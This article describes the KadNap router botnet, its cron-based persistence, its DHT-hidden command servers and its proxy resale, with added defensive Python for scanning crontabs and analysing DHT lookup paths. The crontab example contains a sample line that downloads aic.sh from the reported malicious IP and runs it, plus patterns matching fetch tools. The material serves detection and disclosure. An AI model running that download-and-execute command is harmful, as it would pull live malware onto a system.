A recently discovered malware campaign known as KadNap has co-opted over 14,000 internet-exposed routers and edge devices into a covert proxy botnet. Asus routers appear to be its primary target.
The scale of this campaign is concerning, with more than 60% of the identified victims situated in the United States. Other countries such as Taiwan, Hong Kong, and Russia are also experiencing incidents, highlighting the widespread nature of this threat.
The KadNap campaign first drew attention in early August 2025 when unusual network activity was detected. More than 10,000 Asus devices were observed making connections to a suspicious cluster of servers, which prompted a deeper investigation. Analyses revealed a malicious download chain initiated by a shell script named “aic.sh,” hosted on the IP address 212.104.141[.]140. This script plays a critical role in establishing persistence on the infected devices and orchestrating the delivery of the KadNap malware payload.
The aic.sh script installs a cron job that runs every hour and repeatedly downloads a malicious shell script, which is saved under the name “.asusrouter” and executed from a fixed path. Because the job re-fetches the script on every run, the malware keeps its foothold on the device across reboots and configuration changes.
Lumen’s Black Lotus Labs, the organization that identified this operation, reports that it has been active since at least August 2025. The malicious activity facilitated by the KadNap malware is being employed to reroute harmful traffic through compromised home and small office networks on a global scale. Once the malware establishes persistence, it downloads an ELF binary for the router, renaming it to “kad” before execution, which is the KadNap malware itself.
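The persistence chain just described (an hourly cron job that re-fetches the script as “.asusrouter”, followed by the “kad” ELF) is something a defender can check for in crontab dumps collected from routers. The following Python is an added detection example, not code from the write-up or from Black Lotus Labs. The crontab sample is constructed, and since the article does not give the exact command line the real cron job uses, the sample only imitates its shape; the indicator strings (the stager IP, aic.sh, .asusrouter, kad) are the ones the article reports.

```python
import re
from typing import Iterable

# Indicators taken from the write-up. The stager IP is shown defanged there
# as 212.104.141[.]140; it is re-fanged here only for string matching.
KADNAP_STAGER_HOST = "212.104.141[.]140".replace("[.]", ".")
KADNAP_FILE_NAMES = ("aic.sh", ".asusrouter", "kad")

# Match each file name as a whole token so "kad" does not hit e.g. "kadmin".
_NAME_RES = {
    name: re.compile(r"(?<![\w.])" + re.escape(name) + r"(?!\w)")
    for name in KADNAP_FILE_NAMES
}
# Hourly per-user crontab schedules: "@hourly" or "<minute> * * * *".
_HOURLY_RE = re.compile(r"^\s*(?:@hourly|\d{1,2}(?:,\d{1,2})*\s+\*\s+\*\s+\*\s+\*)\s")
# Tools a router-side stager would use to pull a payload from the network.
_FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")


def indicator_hits(text: str) -> list[str]:
    """Reasons a single command string matches the reported KadNap indicators."""
    reasons = []
    if KADNAP_STAGER_HOST in text:
        reasons.append("contacts known stager host")
    names = [n for n, rx in _NAME_RES.items() if rx.search(text)]
    if names:
        reasons.append("references " + ", ".join(names))
    return reasons


def scan_crontab(lines: Iterable[str]) -> list[dict]:
    """Flag crontab entries that match the described persistence behaviour.

    An entry is reported if it carries a known indicator, or if it is an
    hourly job whose command downloads something from the network, which is
    the generic shape of the persistence even if host or file names change.
    """
    findings = []
    for n, line in enumerate(lines, 1):
        line = line.rstrip("\n")
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank line or comment
        reasons = indicator_hits(line)
        if _HOURLY_RE.match(line) and _FETCH_RE.search(line):
            reasons.append("hourly job that downloads from the network")
        if reasons:
            findings.append({"line_no": n, "line": line, "reasons": reasons})
    return findings


# Constructed sample crontab, not a real capture. Line 3 imitates the described
# chain (hourly fetch of aic.sh saved as .asusrouter); the other lines are benign.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /sbin/logrotate
0 * * * * wget -q -O /tmp/.asusrouter http://212.104.141.140/aic.sh && sh /tmp/.asusrouter
*/15 * * * * /usr/sbin/ntpclient -h pool.ntp.org
"""

if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB.splitlines()):
        print(f"line {f['line_no']}: {'; '.join(f['reasons'])}\n    {f['line']}")
```

The scanner expects the per-user crontab format (no user column), which is what `crontab -l` or the spool files under /var/spool/cron/crontabs on most busybox-based routers contain; a system-wide /etc/crontab with a user field would need the schedule pattern extended. The generic hourly-download rule is deliberately broad and should be tuned against a device's known-good jobs before it is used for alerting.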
KadNap is equipped to target a variety of devices due to its design, which includes samples for both ARM and MIPS architectures. This broad compatibility allows it to affect numerous consumer and edge networking hardware models, extending beyond just Asus routers.
During initialization the malware daemonizes: it forks, redirects standard input and output to /dev/null, and determines the device’s external IP address. It also synchronizes its clock with public NTP servers; that time value is later used to build the cryptographic hashes that govern peer-to-peer communications.
An innovative aspect of the KadNap botnet is its proprietary implementation of the Kademlia Distributed Hash Table (DHT) protocol, commonly utilized in applications such as BitTorrent for decentralized look-ups. Through this implementation, KadNap effectively obscures the genuine IP addresses of its command-and-control (C2) servers. The infected devices utilize DHT lookups to discover C2 endpoints, masking their true nature under the guise of benign peer-to-peer traffic. This technique poses significant challenges for security teams attempting to identify and mitigate KadNap’s infrastructure, as traditional measures such as blocklisting are insufficient against such tactics.
Internally, KadNap operates using multiple threads to facilitate its operational logic. One thread is designated to “find peers,” leveraging known BitTorrent bootstrap nodes to create a custom infohash that connects to other KadNap-infected peers. Another thread, termed “contact peers,” reads from a queue of peer IP addresses, establishes connections, and enforces encrypted communication channels for further instructions and payload deliveries.
Despite its sophisticated design, researchers have uncovered a notable vulnerability within KadNap’s unique Kademlia implementation. In a well-functioning Kademlia framework, the pathway to resources should vary over time to reflect true decentralization. However, all analyzed KadNap samples consistently contacted the same two final nodes before reaching the C2 servers, suggesting a fixed structure that gives attackers substantial control over their operations while still masking themselves within a P2P traffic environment.
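The fixed final hops are something an analyst can test for directly when DHT lookup traces from several samples or sandbox runs are available: in a healthy Kademlia network the nodes closest to a target differ between lookups started from different bootstrap nodes and at different times, so a set of traces that always passes through the same last nodes is the fingerprint described above. The following Python is an added example, not code from the write-up or from Black Lotus Labs; the lookup traces are constructed with TEST-NET addresses, and the trace format (an ordered list of "ip:port" hops ending just before the C2 answer) is an assumption about how a capture would be represented.

```python
from collections import Counter
from typing import Sequence

Path = Sequence[str]  # ordered hops of one DHT lookup, each "ip:port"


def invariant_final_hops(paths: Sequence[Path], depth: int = 2) -> list[str]:
    """Return the final `depth` hops if every lookup ends through the same ones.

    Healthy Kademlia lookups normally return [] here because the closest
    nodes vary. A non-empty result is the fixed structure reported for KadNap.
    """
    if not paths or any(len(p) < depth for p in paths):
        return []
    tails = {tuple(p[-depth:]) for p in paths}
    return list(next(iter(tails))) if len(tails) == 1 else []


def final_hop_concentration(paths: Sequence[Path]) -> float:
    """Fraction of lookups whose last hop is the single most common last hop.

    Values near 1.0 mean the lookups funnel through one node; values near
    1/len(paths) mean the last hop is spread out as decentralization implies.
    """
    counts = Counter(p[-1] for p in paths if p)
    if not counts:
        return 0.0
    return max(counts.values()) / len(paths)


# Constructed lookup traces (TEST-NET addresses, not real infrastructure).
# Each trace runs bootstrap node -> intermediate peers -> the two final nodes
# that hand out the C2 address; the C2 itself is not part of the trace.
KADNAP_LIKE_PATHS = [
    ["192.0.2.10:6881", "203.0.113.4:6881", "198.51.100.7:6881", "198.51.100.9:6881"],
    ["192.0.2.11:6881", "203.0.113.9:6881", "203.0.113.12:6881", "198.51.100.7:6881", "198.51.100.9:6881"],
    ["192.0.2.12:6881", "198.51.100.7:6881", "198.51.100.9:6881"],
    ["192.0.2.10:6881", "203.0.113.20:6881", "198.51.100.7:6881", "198.51.100.9:6881"],
    ["192.0.2.13:6881", "203.0.113.4:6881", "203.0.113.31:6881", "198.51.100.7:6881", "198.51.100.9:6881"],
]

# Constructed traces shaped like an ordinary DHT: the last hop differs each time.
HEALTHY_PATHS = [
    ["192.0.2.10:6881", "203.0.113.4:6881", "203.0.113.40:6881"],
    ["192.0.2.11:6881", "203.0.113.9:6881", "203.0.113.41:6881"],
    ["192.0.2.12:6881", "203.0.113.12:6881", "203.0.113.42:6881"],
    ["192.0.2.10:6881", "203.0.113.20:6881", "203.0.113.43:6881"],
    ["192.0.2.13:6881", "203.0.113.31:6881", "203.0.113.44:6881"],
]

if __name__ == "__main__":
    for label, paths in (("kadnap-like", KADNAP_LIKE_PATHS), ("healthy", HEALTHY_PATHS)):
        fixed = invariant_final_hops(paths)
        conc = final_hop_concentration(paths)
        print(f"{label}: fixed final hops={fixed or 'none'}, concentration={conc:.2f}")
```

The two functions answer different questions: `invariant_final_hops` is the strict check matching what the researchers observed (every sample reaching the C2 through the same two nodes), while `final_hop_concentration` is a softer score that still flags a botnet whose operators rotate one of the final nodes occasionally. Both are useful only on traces gathered across several runs or samples; a single lookup says nothing about variation over time.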
Once successfully recruited, the KadNap bots are utilized to establish a residential proxy service referred to as “Doppelganger.” This service is reported to serve as a rebranded iteration of the Faceless platform, previously powered by TheMoon malware. The distribution of victims is heavily skewed towards the United States, which accounts for 60% of the infected devices, with smaller percentages spread across Taiwan, Hong Kong, and Russia.
The “Doppelganger” service allows cybercriminals to exploit these hijacked devices as anonymous residential proxies, enabling a range of illicit activities such as brute-force attacks and account takeovers without revealing their true origin.
Lumen’s analysis indicates that KadNap has stabilized at an average of approximately 14,000 distinct infected devices daily, operating three to four active C2 servers at any given time. This situation heightens the security challenges for network defenders, particularly regarding the vulnerabilities of small office/home office (SOHO) and Internet of Things (IoT) devices. Essential actions such as disabling remote administration, applying the latest firmware updates, and enforcing strong router credentials are critical recommendations for mitigating this threat.
In response to the growing threat posed by KadNap, Lumen has taken proactive measures by blocking traffic related to the botnet across its network infrastructure, while also committing to sharing indicators of compromise to aid the broader security community in disrupting this malevolent campaign.
